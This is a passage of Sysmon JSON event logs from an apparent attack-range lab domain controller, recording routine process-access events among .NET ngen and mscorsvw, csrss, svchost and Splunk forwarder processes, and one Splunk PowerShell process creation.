C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-00102B1E1300}","TargetProcessId":"2696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-00102B1E1300}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-00102B1E1300}","TargetProcessId":"2696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-00102B1E1300}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-00102B1E1300}","TargetProcessId":"2696","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8135,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.809\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010C9221300}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.809","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010C9221300}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8136,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.825\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010C9221300}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.825","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010C9221300}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010C9221300}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010C9221300}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.076\r\nProcessGuid: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nProcessId: 4272\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.076","ProcessGuid":"{A837DB8D-0515-5F25-0000-0010C8261300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:53.075\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0515-5F25-0000-0010C8261300}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:53.075","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0515-5F25-0000-0010C8261300}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
